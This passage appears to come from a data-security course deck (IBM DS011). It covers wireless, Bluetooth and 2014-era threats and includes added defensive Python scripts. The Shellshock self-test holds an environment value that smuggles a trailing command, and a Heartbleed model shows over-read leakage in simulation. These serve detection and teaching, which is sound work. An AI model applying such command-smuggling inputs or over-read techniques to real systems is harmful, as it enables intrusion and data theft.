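DEFAULT_SSIDS = {"linksys", "netgear", "dlink", "default", "tp-link"}

SCAN = [
    {"ssid": "CorpWiFi", "bssid": "00:11:22:33:44:01", "mode": "infra", "security": "WPA2"},
    {"ssid": "CorpWiFi", "bssid": "00:11:22:33:44:02", "mode": "infra", "security": "WPA2"},
    # Same SSID as the corporate network, unknown BSSID, no encryption: an evil twin.
    {"ssid": "CorpWiFi", "bssid": "de:ad:be:ef:00:01", "mode": "infra", "security": "OPEN"},
    # Factory SSID and no security: an unconfigured SOHO access point.
    {"ssid": "linksys", "bssid": "c0:ff:ee:00:00:01", "mode": "infra", "security": "OPEN"},
    # An ad-hoc network shared from an employee laptop.
    {"ssid": "Free WiFi", "bssid": "02:aa:bb:cc:dd:01", "mode": "ad-hoc", "security": "WEP"},
]


def audit_scan(scan, authorized=AUTHORIZED_APS, default_ssids=DEFAULT_SSIDS):
    """Return (bssid, issue) findings: rogue APs spoofing a corporate SSID,
    ad-hoc networks, unconfigured devices and weak or absent encryption."""
    findings = []
    for ap in scan:
        ssid = ap["ssid"]
        bssid = ap["bssid"].lower()
        sec = ap["security"].upper()
        if ssid in authorized and bssid not in authorized[ssid]:
            findings.append((bssid, f"rogue AP advertising corporate SSID {ssid!r}"))
        if ap["mode"] == "ad-hoc":
            findings.append((bssid, f"unauthorized ad-hoc network {ssid!r}"))
        if ssid.lower() in default_ssids:
            findings.append((bssid, f"default SSID {ssid!r}: likely unconfigured device"))
        if sec in ("OPEN", "WEP"):
            findings.append((bssid, f"weak or no encryption ({sec}) on {ssid!r}"))
    return findings


def rogue_bssids(scan, authorized=AUTHORIZED_APS):
    """Just the BSSIDs impersonating an authorized SSID (the evil-twin case)."""
    return sorted(b for b, issue in audit_scan(scan, authorized) if issue.startswith("rogue AP"))


if __name__ == "__main__":
    for bssid, issue in audit_scan(SCAN):
        print(f"{bssid}  {issue}")
```

The BSSID allowlist is what makes the evil twin visible: a rogue access point can copy the SSID and the security settings, but it cannot advertise a MAC address it does not own without breaking the legitimate network on the same channel. Running the audit on a schedule turns the survey into a detection control rather than a one-off.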


Wireless Network Security Threats (5 of 5)

• Passive Capturing
– Listening to and capturing wireless traffic from within range of the network

– Unsecured traffic can be analyzed directly, or the current security settings can be attacked offline

– Stronger security measures (strong encryption and authentication) keep captured traffic unreadable


Figure 1-69. Wireless Network Security Threats (5 of 5) DS011.0

Notes:
Passive Capturing: Listening to and capturing data simply by coming within range of a wireless network is
called passive capturing. Unsecured traffic can be analyzed, or the current security settings can be broken,
just by getting within range of the network. Since a wireless network needs no physical access, there is no real
way to prevent an attacker in range from capturing frames. However, stronger security measures, in particular
strong encryption and authentication such as WPA2, ensure that captured traffic cannot be read and so
provide a higher level of security.


Types of Data Security Threats (Contd.)

• Bluetooth Devices Threats


– Bluetooth was officially approved in the summer of 1999

– Bluetooth offers several benefits and advantages, but these benefits do not come without risk

– Bluetooth security consists of authorization, authentication and optional encryption


Figure 1-70. Types of Data Security Threats (Contd.) DS011.0

Notes:
Bluetooth devices threats
Bluetooth technology is a cheap, reliable and power-efficient replacement for the cables that connect
electronic devices. The technology was officially approved in the summer of 1999 and has since been used
widely in electronic devices of all kinds. Bluetooth offers several benefits and advantages, but those benefits
do not come without risk. Bluetooth security consists of authorization, authentication and optional encryption.
Authentication is one Bluetooth-enabled device proving its identity to another. Authorization is granting or
denying a requesting device access to resources or services over the Bluetooth connection. Encryption is
transforming the data into a form that eavesdroppers cannot read. Despite all of these defense mechanisms,
the use of Bluetooth may still result in exploits and loss of data through various threats. These threats are
illustrated in the slide which follows.


Bluetooth Devices Threats (1 of 5)


Figure 1-71. Bluetooth Devices Threats (1 of 5) DS011.0

Notes:
This slide illustrates the different types of Bluetooth device threats which have been explained in the slides
which follow.


Bluetooth Devices Threats (2 of 5)

• Blue-jacking
– Unsolicited messages or business cards are sent by an attacker to a Bluetooth-enabled device

– Bluejacking resembles the phishing attacks and spam carried out against e-mail users

– Bluetooth device owners should be aware that it can be the start of a variety of social engineering
attacks that manipulate the user into performing actions or divulging confidential information


Figure 1-72. Bluetooth Devices Threats (2 of 5) DS011.0

Notes:
Blue-jacking: This is the sending of unsolicited messages or business cards by an attacker to a Bluetooth-
enabled device. Bluejacking resembles the phishing attacks and spam carried out against e-mail users. When
a bluejacking message is sent with harmful intent, it may entice the user to respond by adding the new contact
to the device's address book. Bluetooth device owners should be aware that this can lead to a variety of
social engineering attacks that manipulate the user into performing actions or divulging confidential
information. Devices set to non-discoverable mode are not susceptible to bluejacking, and for bluejacking to
work the sending and receiving devices must be within about 10 meters of each other.


Bluetooth Devices Threats (3 of 5)

• Blue-snarfing
– A connection is forced to a Bluetooth-enabled device in order to access the data on it

– The IMEI number stored in the phone's memory can be abused to divert calls

– It is much more malicious than bluejacking


Figure 1-73. Bluetooth Devices Threats (3 of 5) DS011.0

Notes:
Blue-snarfing: This is a method that forces a connection to a Bluetooth-enabled device in order to access
data such as the calendar, contact list, text messages, e-mails, pictures and the IMEI number (international
mobile equipment identity). The IMEI number is stored in the phone's memory. It is a unique identifier for the
device, and an attacker who obtains it can abuse it to divert all incoming calls from the user's device to the
attacker's device. Because sensitive information may be stolen from devices through bluesnarfing, it is much
more malicious than bluejacking, even though both exploit the device's Bluetooth connection without the
owner's knowledge. Setting a device's Bluetooth to non-discoverable mode makes it less susceptible to
bluesnarfing, although it may still be bluesnarfed through a brute-force attack on its device address.


Bluetooth Devices Threats (4 of 5)

• Blue-bugging
– This method was developed after the onset of bluejacking and bluesnarfing

– Attackers access a Bluetooth device remotely

– The features are used in examining calendars, reading the phonebooks, connecting to Internet,
placing calls etc.


Figure 1-74. Bluetooth Devices Threats (4 of 5) DS011.0

Notes:
Blue-bugging: This method was developed after the onset of bluejacking and bluesnarfing. It allows attackers
to access a Bluetooth-enabled device remotely and then use its features to examine the calendar, read the
phonebook, connect to the Internet, place calls, eavesdrop on a call by forwarding it, and send text and
multimedia messages, all without the user's knowledge. As with the other Bluetooth attacks, the attacker
must be within about 10 meters of the device.


Bluetooth Devices Threats (5 of 5)

• Blue-smack
– This is a DoS attack against Bluetooth

– The device is overwhelmed by a flood of requests generated by the attacker

– The requests are malicious in nature and leave the device in an inoperable state


Figure 1-75. Bluetooth Devices Threats (5 of 5) DS011.0

Notes:
Bluesmack: This is a DoS attack against Bluetooth. The Bluetooth-enabled device is overwhelmed by a flood
of requests (oversized L2CAP echo, or "ping", requests) generated by an attacker. These malicious requests
leave the device in an inoperable state for its owner and drain its battery, affecting the continued operation of
the device after the attack. Because of the proximity required for a Bluetooth connection, users can move the
device to a new location to stop the attack.
These are the different threats that a data security system faces. Threats exploit vulnerabilities present in the
system and bring the system down. The vulnerabilities, and the countermeasures that mitigate these risks,
are discussed in the following chapters.


Data Threats in Modern Era (1 of 6)

• Overt hostility between people has fallen to lower levels, yet data security threats have
increased

• Facebook scams have gone out of hand

• Shellshock and Heartbleed, and a series of very large retail breaches


Figure 1-76. Data Threats in Modern Era (1 of 6) DS011.0

Notes:
Data threats in modern era
Looking at the modern era, and at the year 2014 in particular, overt hostility between people has fallen to
much lower levels, yet data security threats have increased. As we learn from the past, new complications
await in the future. Some of the data breach examples from 2014 are Facebook scams that got out of hand,
the Shellshock and Heartbleed bugs and a series of very large retail breaches. Some of the most common
threats of the year 2014 are given in the slides that follow.


Data Threats in Modern Era (2 of 6)

• Cloud Disaster
– Organizations are rushing to the cloud and have become over-dependent on it

– There were some serious cloud computing incidents in the year 2014

– Amazon was forced to reboot many of its EC2 instances to patch a Xen hypervisor bug


Figure 1-77. Data Threats in Modern Era (2 of 6) DS011.0

Notes:
Cloud disasters: Organizations are rushing to the cloud and have become over-dependent on it, yet they are
terrified when it comes to cloud security. There were some serious cloud computing incidents in 2014. For
example, Amazon was forced to reboot many of its EC2 instances to patch a bug in the Xen hypervisor, and
private photos of celebrities stored on Apple's iCloud were stolen and published. Cloud disasters, and the
threats that led to them, were thus in the news throughout 2014.


Data Threats in Modern Era (3 of 6)

• Threats Associated with Application Security


– Different applications were affected

– The personal information and privacy of 7 million online service users were violated in the year
2014

– Millions of Dropbox account credentials were breached


Figure 1-78. Data Threats in Modern Era (3 of 6) DS011.0

Notes:
Threats associated with application security: These threats affected different applications greatly; data was
breached and then published publicly. For example, the personal information and privacy of 7 million online
service users were violated in 2014 through two of the biggest data thefts of the year, involving the Dropbox
and Snapchat applications. Millions of Dropbox account credentials were breached, and the user names and
passwords associated with those accounts were published without the users' knowledge.


Data Threats in Modern Era (4 of 6)

• IoT Security Threats


– IoT devices are exposed to the same attacks as other Internet-connected devices, such as denial-of-
service attacks

– One major IoT attack disclosed recently was found by Akamai Technologies Inc.

– Its researchers reported distributed denial-of-service (DDoS) attacks that began by abusing insecure
IoT device configurations


Figure 1-79. Data Threats in Modern Era (4 of 6) DS011.0

Notes:
IoT Security Threats: Internet of Things (IoT) devices are the newest round of devices connected directly to IP
networks, and they inherit the network security risks that come with that connection. Thus, IoT attacks are
inevitable. IoT devices are exposed to the same attacks as other Internet-connected devices, such as
denial-of-service attacks or default accounts with default passwords, and enterprises may already have
encountered such issues. While the attack surface of a single device may be smaller than that of a traditional
desktop or server, when all IoT devices are added together, even minor security issues turn into significant
problems. One major IoT attack disclosed recently was found by Akamai Technologies Inc. Researchers
reported distributed denial-of-service (DDoS) attacks that started using insecure IoT device configurations.
More specifically, attackers identified how the Simple Service Discovery Protocol (SSDP) can be abused to
amplify malicious responses to spoofed IP traffic, so that the devices participate in DDoS attacks. Researchers
noted that attackers target network ranges in their scanning and send SSDP search requests to identify IoT
devices; the response traffic is then sent to the target network as part of the DDoS attack.
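The SSDP reflection pattern described above can be spotted in ordinary flow records: many distinct devices answering on UDP/1900 all send their (larger) replies to one address that never asked for them. The following Python script is an added example, not part of the course notes; the flow records, the field names and the alert thresholds are constructed for the demonstration.

```python
"""Spot SSDP reflection traffic in UDP flow records.

Added example (not from the course material). The flow records below are
constructed; field names and thresholds are this example's own choices.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple

SSDP_PORT = 1900  # UDP port used by SSDP M-SEARCH requests and their replies


class Flow(NamedTuple):
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    nbytes: int


# Constructed sample: three UPnP devices on the Internet all answering
# spoofed M-SEARCH requests, so their replies land on one victim address,
# plus one benign discovery exchange on a LAN (request, then one reply).
SAMPLE_FLOWS: List[Flow] = [
    Flow("198.51.100.10", SSDP_PORT, "203.0.113.5", 43123, 120, 39000),
    Flow("198.51.100.11", SSDP_PORT, "203.0.113.5", 43123, 98, 31500),
    Flow("198.51.100.12", SSDP_PORT, "203.0.113.5", 43123, 110, 35800),
    Flow("192.168.1.20", 52000, "239.255.255.250", SSDP_PORT, 1, 132),
    Flow("192.168.1.1", SSDP_PORT, "192.168.1.20", 52000, 1, 310),
]


def amplification_factor(request_bytes: int, response_bytes: int) -> float:
    """Bytes the reflector emits per byte of spoofed request it received."""
    if request_bytes <= 0:
        raise ValueError("request size must be positive")
    return response_bytes / request_bytes


def find_reflection_targets(flows, min_reflectors: int = 3,
                            min_bytes: int = 50_000) -> Dict[str, dict]:
    """Group SSDP reply traffic (source port 1900) by destination address.

    One LAN host receiving a reply from one device is normal discovery.
    Many distinct devices all replying to the same address, with a large
    byte total, is the reflection pattern the notes describe.
    """
    per_target = defaultdict(lambda: {"reflectors": set(), "bytes": 0, "packets": 0})
    for f in flows:
        if f.src_port != SSDP_PORT:
            continue  # only reply traffic is reflected onto the victim
        entry = per_target[f.dst_ip]
        entry["reflectors"].add(f.src_ip)
        entry["bytes"] += f.nbytes
        entry["packets"] += f.packets

    alerts = {}
    for target, e in per_target.items():
        if len(e["reflectors"]) >= min_reflectors and e["bytes"] >= min_bytes:
            alerts[target] = {
                "reflectors": sorted(e["reflectors"]),
                "bytes": e["bytes"],
                "packets": e["packets"],
            }
    return alerts


if __name__ == "__main__":
    for target, info in find_reflection_targets(SAMPLE_FLOWS).items():
        print(f"{target}: {len(info['reflectors'])} reflectors, {info['bytes']} bytes")
```

The per-byte ratio from `amplification_factor` is what makes SSDP attractive as a reflector: a short M-SEARCH produces a reply several times its size. On the mitigation side, the same records show which of your own devices are answering discovery requests from the Internet, which is the configuration problem the notes refer to; such devices should not expose UDP/1900 beyond the LAN.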

1-82 IT Data Security © Copyright IBM Corp. 2015


V10.1
Data Threats in Modern Era (5 of 6)

• Shellshock
– The Shellshock Unix/Linux Bash security hole affected almost half of the websites on the internet

– UNIX, Linux and Mac servers were an easy target for malware, as Shellshock offered an easy pathway for
worm entry

– Mail servers on these systems were affected by the bug, which had been in the Bash shell for around 20
years


Figure 1-80. Data Threats in Modern Era (5 of 6) DS011.0

Notes:
Shellshock: A security loophole detected in September 2014 made the news and was considered a serious
problem. Known as the Shellshock Unix/Linux Bash security hole, it affected almost half of the websites on the
internet. UNIX, Linux and Mac servers were an easy target for malware, as Shellshock offered an easy
pathway for worm entry. Mail servers on these systems were affected, and the bug, which had been in the
Bash shell for around 20 years, could be triggered through a configuration value and was exploited openly on
its first day in the public.
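A practical follow-up to the Shellshock notes is checking whether a given host still carries the bug. The Python script below is an added example, not part of the course material: it runs the widely published self-test, setting an environment variable whose value looks like an exported function definition followed by an extra command, and reports whether a freshly started bash ran that extra command (unfixed) or ignored it (fixed). The marker strings and the return values are this example's own choices.

```python
"""Self-check for the Shellshock class of bash bug on the local system.

Added example (not from the course material).  A fixed bash imports only
the function body from such a variable; an unfixed one also executes the
commands that follow it while reading its environment at start-up.
"""
import re
import shutil
import subprocess
from typing import Optional, Tuple

# Variable value shaped like an exported bash function, with a trailing
# command that must never run.  The echo is the only thing it would do.
PROBE_VALUE = "() { :;}; echo SHELLSHOCK-PROBE-RAN"


def parse_bash_version(version_output: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from the output of `bash --version`."""
    m = re.search(r"version (\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def bash_version(bash_path: Optional[str] = None) -> Optional[Tuple[int, int, int]]:
    """Version tuple of the bash binary on PATH (or the one given), for reporting."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    try:
        out = subprocess.run([bash, "--version"], capture_output=True,
                             text=True, timeout=5).stdout
    except (OSError, subprocess.SubprocessError):
        return None
    return parse_bash_version(out)


def shellshock_status(bash_path: Optional[str] = None, timeout: float = 5.0) -> str:
    """Return 'vulnerable', 'patched' or 'unknown' for the given bash binary."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return "unknown"
    # Minimal environment: PATH so `echo` resolves, plus the probe variable.
    env = {"PATH": "/usr/bin:/bin", "SHELLSHOCK_PROBE": PROBE_VALUE}
    try:
        proc = subprocess.run(
            [bash, "-c", "echo probe-complete"],
            env=env, capture_output=True, text=True, timeout=timeout,
        )
    except (OSError, subprocess.SubprocessError):
        return "unknown"          # no such binary, or it hung
    if "SHELLSHOCK-PROBE-RAN" in proc.stdout:
        return "vulnerable"       # the trailing command ran at start-up
    if "probe-complete" in proc.stdout:
        return "patched"          # bash ran only what it was asked to
    return "unknown"


if __name__ == "__main__":
    print("bash version:", bash_version())
    print("shellshock status:", shellshock_status())
```

The check exercises the same path the bug lives in (environment import at start-up), so it is more reliable than comparing version strings, which differ between vendor backports; the version helper is there only to record what was tested. A result of `unknown` means the probe could not run and says nothing about the host.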

Data Threats in Modern Era (6 of 6)

• Heartbleed
– Sensitive data (like passwords and encryption keys) are at risk

– A hacker can easily get his hands on confidential information

– The data can be swiped, leaving no track or trace


Figure 1-81. Data Threats in Modern Era (6 of 6) DS011.0

Notes:
Heartbleed: Because of this encryption loophole, sensitive data (like passwords and encryption keys) are at
risk, since it provides access to view secure communication across HTTPS. A hacker can easily get his hands
on confidential information such as financial details or personal identity data. The data can then be swiped,
leaving no track or trace.
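The notes describe what Heartbleed exposed but not the defect behind it, which was a missing bounds check: the server trusted the length field inside a heartbeat message and copied that many bytes back to the sender, whatever the message actually contained. The Python model below is an added example, not from the course material; it keeps the real message layout (type, two-byte payload length, payload, padding) but the "process memory" and the secret planted in it are constructed for the demonstration, and the two handler functions are this example's own.

```python
"""Heartbeat record handling: the length bug behind Heartbleed, next to the fix.

Added example (not from the course material).  The record layout mirrors the
TLS heartbeat message (1-byte type, 2-byte payload length, payload, padding);
the memory image and the secret placed in it are constructed for the demo.
"""
import struct
from typing import Optional

HEADER = struct.Struct("!BH")   # type, payload_length (big-endian)
PADDING = 16                    # minimum padding after the payload
HB_REQUEST, HB_RESPONSE = 1, 2

# Constructed memory image: 32 bytes of receive buffer, then data the server
# must never send back (a stand-in for session keys or another user's data).
MEMORY_TEMPLATE = b"\x00" * 32 + b"SECRET-COOKIE=abc123" + b"\x00" * 12


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Build a heartbeat request; claimed_len lets the sender lie about the length."""
    length = len(payload) if claimed_len is None else claimed_len
    return HEADER.pack(HB_REQUEST, length) + payload + b"\x00" * PADDING


def _receive(record: bytes) -> bytearray:
    """Model the server copying the record into the front of its buffer."""
    mem = bytearray(MEMORY_TEMPLATE)
    mem[: len(record)] = record
    return mem


def respond_unchecked(record: bytes) -> bytes:
    """The defect: trusts payload_length and copies that many bytes out of memory."""
    _type, claimed = HEADER.unpack_from(record)
    mem = _receive(record)
    # Nothing relates `claimed` to len(record); an over-stated length walks
    # past the record into whatever sits after it in the buffer.
    return bytes(mem[HEADER.size: HEADER.size + claimed])


def respond_checked(record: bytes) -> Optional[bytes]:
    """The fix: discard any record whose stated payload does not fit inside it."""
    if len(record) < HEADER.size + PADDING:
        return None
    _type, claimed = HEADER.unpack_from(record)
    if HEADER.size + claimed + PADDING > len(record):
        return None  # silently drop the malformed record
    mem = _receive(record)
    return bytes(mem[HEADER.size: HEADER.size + claimed])


if __name__ == "__main__":
    lying = build_heartbeat(b"hello", claimed_len=60)
    print("unchecked reply contains secret:", b"SECRET" in respond_unchecked(lying))
    print("checked reply:", respond_checked(lying))
```

The point to take from the pair is that the honest request behaves identically under both handlers; only the over-stated length separates them, which is why the bug went unnoticed in normal operation and why the fix is a single comparison against the real record size.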

Benefits of Data Security (1 of 2)

• Confidentiality, integrity and availability of data are maintained

• It is made sure that the vital data is not misused

• Data security can make an organization’s data secure


Figure 1-82. Benefits of Data Security (1 of 2) DS011.0

Notes:
Benefits of Data Security
When running a new organization or a small business, all sorts of personal data and information have to be
dealt with. To ensure that this data is not abused or used in a way that might compromise the customer or
private individual to their detriment, a data security mechanism should be in place. There are many
advantages of securing data, which are explained in the slides that follow.

Benefits of Data Security (2 of 2)

• Critical Information Protection

• Reduce Costs of Development

• Software Interoperability

• Meeting Current Standards


Figure 1-83. Benefits of Data Security (2 of 2) DS011.0

Notes:
Critical information protection: Sensitive information is always at risk and must always be kept under
protection. Loss of valuable information can bring an organization to its knees. Whether the organization is
developing a factory automation solution or a custom application, the valuable application must be protected
to keep the IT infrastructure of the organization intact.
Reduced Costs of Development: An organization should have a well-structured security system. Premature
addition of security, before the real needs are understood or before the necessary systems are installed,
results in massive modifications of code. If the software is left unsecured, it can cause unintentional loss of
data. This further leads to reduced development, significant loss of money and loss of time, and the
organization will then be forced to add security afterwards.
Software Interoperability: Software interoperability can be improved if an organization has a well-built
security framework. Exchange formats and custom data storage are preferred by organizations because they
think these mechanisms can be implemented quickly and effectively. However, this later leads to added
expenses once the need to communicate with other applications arises, which in turn requires data
converters to be created or formats to be altered. This asks for additional resources to be spent, but in turn
ensures the best achievable software interoperability.
Meeting Current Standards: To ensure that data is secured properly, the current technology must be kept
updated. Certain standards need to be followed, and these standards should be updated from time to time so
as to provide adequate data protection. Keeping in sync with the developments being made is an important
part of software security.

Checkpoint (1 of 4)

1. Bluebugging is associated to which wireless device?


– Infrared
– Wi-Fi
– Bluetooth
– ZigBee

2. Which bug forced Amazon to reboot its EC2 instances?


– Xen bug
– Shellshock bug
– Heartbleed bug
– Software bug

3. The art of manipulating people so that they give up confidential information is called?


– Hacking
– Social engineering
– Packet Sniffing
– Phishing


Figure 1-84. Checkpoint (1 of 4) DS011.0

Notes:
Write down your answers here
1. …
2. …
3. ...

Checkpoint (2 of 4)

4. Frequency Analysis is included in which technique?


– Code-breaking technique
– Code-attacking technique
– Code-simplifying technique
– Code-revealing technique

5. A resource is changed or deleted without authorization in?


– Spoofing
– Repudiation
– Tampering
– Fuzzing

6. In which technique are values and actions inserted unexpectedly as an application’s input in order to
crash it?
– Spoofing
– Repudiation
– Tampering
– Fuzzing


Figure 1-85. Checkpoint (2 of 4) DS011.0

Notes:
Write down your answers here:
4. …
5. ….
6. ...

Checkpoint (3 of 4)

7. Which of the following is a cryptographic threat?


– Bluebugging
– Hacking and Social Engineering Threat
– Botnets
– Birthday Attack

8. Which of the following is a network based threat?


– Bluebugging
– Hacking and Social Engineering Threat
– Botnets
– Tampering


Figure 1-86. Checkpoint (3 of 4) DS011.0

Notes:
Write down your answers here
7. …
8. …

Checkpoint (4 of 4)

9. Polymorphic is a?
– Virus
– Worms
– Trojan
– Bug

10. Which are the two different channels which are most vulnerable in the modern times?
– Physical storage and Data networks
– Data storage and Physical networks
– All of the above
– None of the above


Figure 1-87. Checkpoint (4 of 4) DS011.0

Notes:
Write down your answers here
9. …
10. …

Unit summary

Having completed this unit, you should be able to:


• Understand the background of Data Security
• Recognize various associated threats
• Classify different threats associated with Data Security


Figure 1-88. Unit summary DS011.0

Notes:

Unit 2. Data Security Threat Techniques

What this unit is about


This unit is about
• Introduction to threat techniques
• Classification of different threat techniques
• Process involved in attacks

What you should be able to do


After completing this unit, you should be able to:
• Have a basic understanding of threat techniques
• Classify all the threat techniques
• Identify and understand the steps involved in various attacks

How you will check your progress


• Checkpoint

References
Norman, "Assessing Vulnerability", Risk Analysis and Security Countermeasure Selection,
2009
http://www.microsoft.com/technet/security/bestprac/bpent/sec1/secthret.mspx
http://www.giac.org/paper/gsec/4152/identity-theft-attacks-countermeasures/106663
http://www.nsf.gov/oig/identitytheft.pdf
http://www.ils.unc.edu/~wenyang/inls258/wenyang.htm

Welcome to:

IT Data Security – Data Security Threat Techniques


Figure 2-1. IT Data Security – Data Security Threat Techniques DS011.0

Notes:

Unit objectives

After completing this unit, you should be able to:


• Have a basic understanding of threat techniques
• Classify all the threat techniques
• Identify and understand the steps involved in various attacks


Figure 2-2. Unit objectives DS011.0

Notes:

Introduction

• An event or a person who has the potential to affect a valuable resource in a negative manner can be
termed a threat

• Software and hardware systems, and the data that they hold, can be vulnerable to a huge variety of
threats

• When selecting security procedures and features, the specific vulnerabilities associated with the system
must be considered, not just the general objectives of security

• Thus it can be said that a factor which possesses the potential to impact a resource that is valuable to an
organization in a negative manner is known as a threat

• The way that these factors follow to carry out the negative effect is known as a threat technique


Figure 2-3. Introduction DS011.0

Notes:
Introduction
An event or a person who has the potential to affect a valuable resource in a negative manner can be termed
a threat. The quality of a resource which allows the threat to be carried out is the vulnerability of that
resource. For example, in the case of a bank robbery, the robber is the threat and the bank teller is the
valuable resource which is vulnerable to a robbery. The robber can shoot and kill the bank teller, but
bullet-proof glass between the teller and the robber will deny the latter the chance to kill the former. Although
the threat still persists, the presence of a protective mechanism, that is, the bullet-proof glass, mitigates it.
Thus it can be said that vulnerability and threat are not the same thing. In data and system security as well,
threats remain present but can be mitigated through the proper implementation of security processes and
features, which will be discussed in the next chapter. Preventing or mitigating a threat so that it does not have
a bad effect on the organization is known as implementing countermeasures.
Software and hardware systems, and the data that they hold, can be vulnerable to a huge variety of threats.
When selecting security procedures and features, the specific vulnerabilities associated with the system must
be considered, not just the general objectives of security. Over-protection of a resource only creates
inconvenience for the user of the resource.
Thus it can be said that a factor which possesses the potential to impact a resource that is valuable to an
organization in a negative manner is known as a threat, and the way that these factors follow to carry out the
negative effect is known as a threat technique. Discussed below are all the threat techniques that can affect
the assets of an organization.

Threat Techniques (1 of 66)

• A weakness or fault in a system or protection mechanism that opens it to attack or damage

• Threat techniques also change according to the field of security

• The following slides describe all these threat techniques in detail according to the area of security


Figure 2-4. Threat Techniques (1 of 66) DS011.0

Notes:
Threat Techniques
A weakness or fault in a system or protection mechanism that opens it to attack or damage is known as a
threat technique. Different areas of security, that is, physical security, network security and so on, have
different threats associated with them, and as a result the threat techniques also change according to the field
of security. The following slides describe all these threat techniques in detail according to the area of
security.

Threat Techniques (2 of 66)

• Malware Threat Techniques


– Malware exploits the holes present in the security of a browser

– Consumers are tricked into downloading certain software

– This is a trick whereby consumers actually download malware onto their systems


Figure 2-5. Threat Techniques (2 of 66) DS011.0

Notes:
Malware Threat Techniques
To invade a machine, malware exploits the holes present in the security of a browser. Sometimes consumers
are tricked into downloading certain software which the website states is compulsory for viewing some
content of the site. This is a trick whereby consumers actually download malware onto their systems. They
are given two options, yes or no. If they click yes, they download the malware to their systems, and if they
click no, many error windows are displayed. Some sites also tell the customer to install a certificate that will
make the site safe to use. This is also a trick used by the website to download malware onto the customer’s
system.

Threat Techniques (3 of 66)

• Malware Threat Techniques


– Malware installs code in hidden and unexpected places, such as the Windows registry

– The operating system is sometimes modified by malware

– This makes the malware difficult to uninstall


Figure 2-6. Threat Techniques (3 of 66) DS011.0

Notes:
Some malware provides no uninstall option and installs code in hidden and unexpected places, such as the
Windows registry. It also sometimes modifies the operating system, which makes it difficult to remove or
uninstall.
The diagram in the next slide illustrates the 5 stages of a web malware attack.

Threat Techniques (4 of 66)


Figure 2-7. Threat Techniques (4 of 66) DS011.0

Notes:
The five stages of a malware attack are illustrated in this slide. These stages are explained in the slides which
follow.

Threat Techniques (5 of 66)

• Stage 1: Entry

• Stage 2: Distribution

• Stage 3: Exploit

• Stage 4: Infect

• Stage 5: Execute


Figure 2-8. Threat Techniques (5 of 66) DS011.0

Notes:
Stage 1: Entry: The first part of an attack involves a drive-by download from an entry point, either a hijacked
website or an email that contains a malicious link.
Drive-by downloads: A drive-by download is the process of inadvertently downloading malicious web code
simply by visiting a web page. A drive-by download happens automatically and without the user knowing. The
most common type of drive-by download is an invisible 0x0 pixel iFrame that contains malicious JavaScript
code. This sophisticated JavaScript can be masked by obfuscation (in other words, made unreadable) and
can be polymorphic (meaning the code changes with each view). Traditional signature-based antivirus
solutions can’t detect this kind of tricky code.
Stage 2: Distribution: Once a drive-by download has reached the browser, the unsuspecting user is
redirected to download an exploit kit. However, rather than sending users to known exploit kit hosting sites,
elaborate traffic distribution systems (TDS) create multiple redirections that are nearly impossible to track and
therefore to black-list.
Some TDS systems are legitimate, for instance those used for advertising and referral networks. But like any
software, legitimate TDS solutions are prone to being hacked and exploited to drive traffic to malware hosting
sites instead of a benign destination.
Stage 3: Exploit: The next phase of a modern web attack is the downloading of an exploit pack from the
malware hosting site. These kits execute a large number of exploits against vulnerabilities in web browsers
and associated plug-ins such as Java, PDF readers and media players.

Stage 4: Infect: Once the attacker exploits an application vulnerability to gain some control over the
computer, the next step in the attack is to download a malicious payload to infect the system. The payload is
the actual malware or virus that will ultimately steal data or extort money from the user.
The hacker can choose from a wide range of different infectious payloads. Here are some of the most
common payloads used today.
• Zbot (Zeus): Zeus is a Trojan horse that steals personal information by logging keystrokes and grabbing
frames in the browser. It initially targeted Windows machines, but variants have been found that infect
Android mobile devices as well.
• Ransomware: Ransomware is a class of malware that restricts access to a user’s computer or files,
demanding payment to regain access. It primarily targets Windows, but there’s also a less harmful but
equally annoying Mac variant that recently started appearing.
• PWS: PWS is a password-stealing and remote access Trojan that infects Windows computers.
• Sinowal (Torpig): Torpig is a botnet infection which targets Microsoft Windows computers. It uses a
rootkit to steal credentials and allow remote access.
• FakeAV: FakeAV (fake antivirus) installs a rogue security software client that appears to be a desktop
antivirus application. It scans and finds numerous fake viruses and extorts the user into paying to “clean
up” the viruses. It primarily plagued Windows systems, but is now being found on Macs as well.
Stage 5: Execute: In this final stage of the attack, the malicious payload has been downloaded and installed
on the victim’s system, and now its job is to make the criminal behind it some money. It can do that in a
number of ways: by providing credentials, banking or credit card information that can be sold on the black
market, or by extorting the user into paying directly. Ransomware and FakeAV are both examples of malware
that extort victims into paying.

Threat Techniques (6 of 66)

• Stage 1: Entry
– This involves a drive-by download from an entry point

– A drive-by download is the process of inadvertently downloading malicious web code

– A drive-by download happens automatically and without the user knowing


Figure 2-9. Threat Techniques (6 of 66) DS011.0

Notes:
Stage 1: Entry: The first part of an attack involves a drive-by download from an entry point, either a hijacked
website or an email that contains a malicious link.
Drive-by downloads: A drive-by download is the process of inadvertently downloading malicious web code
simply by visiting a web page. A drive-by download happens automatically and without the user knowing. The
most common type of drive-by download is an invisible 0x0 pixel iFrame that contains malicious JavaScript
code. This sophisticated JavaScript can be masked by obfuscation (in other words, made unreadable) and
can be polymorphic (meaning the code changes with each view). Traditional signature-based antivirus
solutions can’t detect this kind of tricky code.
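The Stage 1 notes here and in the five-stage overview earlier name two concrete markers of a drive-by download page: an invisible (0x0 pixel or hidden) iframe and inline JavaScript hidden behind obfuscation. The Python scanner below is an added example, not part of the course material; it looks for exactly those two markers in page source using the standard-library HTML parser. The two sample pages, the placeholder domains and the scoring thresholds are constructed for the demonstration.

```python
"""Static checks for the drive-by-download markers named in the notes.

Added example, not from the course material: flags invisible or hidden
iframes and inline scripts that show obfuscation indicators.  The sample
pages are constructed; the domains in them are placeholders.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
# Calls that ordinary page code rarely needs but unpacking stubs lean on.
OBFUSCATION_CALLS = ("eval(", "unescape(", "String.fromCharCode(")


def _pixels(value: Optional[str]) -> Optional[int]:
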